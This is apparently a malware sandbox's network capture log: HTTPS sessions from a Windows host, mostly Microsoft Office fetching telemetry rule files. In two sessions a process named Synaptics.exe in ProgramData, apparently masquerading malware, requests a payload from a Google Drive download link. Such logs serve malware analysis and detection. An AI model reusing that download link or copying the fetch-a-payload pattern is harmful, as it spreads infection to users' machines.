                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                        x-ms-request-id: 16655d81-601e-0084-07c4-456b3f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bdkw94lhC1EWRxuz400000003cg00000000rxtm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        33192.168.2.54978413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:28 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA701121"
                                                                                        x-ms-request-id: b5189c33-801e-008c-34cb-457130000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bdqpttnhC1EWRe1wg000000033g000000003kbz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        34192.168.2.54978713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:28 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 464
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                        x-ms-request-id: 2e94baaf-201e-005d-6b5f-47afb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bd5gpk5hC1EWR8dk400000000u0000000003haz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        35192.168.2.54978813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:28 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:28 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                        x-ms-request-id: 9b0204ab-501e-0047-62c1-45ce6c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215028Z-1746fd949bd77mkmhC1EWR5efc00000003pg00000000003c
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:28 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        36192.168.2.54978513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:28 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:29 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:29 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                        x-ms-request-id: de914170-201e-0000-68ad-45a537000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215029Z-1746fd949bddtfvqhC1EWRxbpg000000034g00000000t6eq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.549793172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:30 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:29 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SlBZz9ZyVuPJktLdd7Iatg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.549794172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:30 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:29 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SiAUGKHZnR0-21ja0fTyCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        39192.168.2.54979513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:30 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                        ETag: "0x8DC582B9748630E"
                                                                                        x-ms-request-id: e2fa4791-901e-0029-7295-46274a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bdjrnwqhC1EWRpg2800000003f00000000006t3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        40192.168.2.54979613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:30 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                        x-ms-request-id: dbf7ebc2-101e-00a2-0ac7-459f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bdnq7x2hC1EWRpxr0000000034g00000000c9x9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        41192.168.2.54979713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:30 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                        x-ms-request-id: 1e40fce6-401e-0078-1bd2-454d34000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bddtfvqhC1EWRxbpg00000003300000000125zm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        42192.168.2.54979813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:30 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:30 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:30 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                        x-ms-request-id: 76d3483c-401e-00a3-2bcc-458b09000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215030Z-1746fd949bdfg4slhC1EWR34t0000000037g000000004850
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        43192.168.2.54980013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:31 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:31 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:31 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 428
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                        x-ms-request-id: c29bf332-501e-00a0-0ccb-459d9f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215031Z-1746fd949bdb8xvchC1EWRmbd400000003ag000000001sw0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
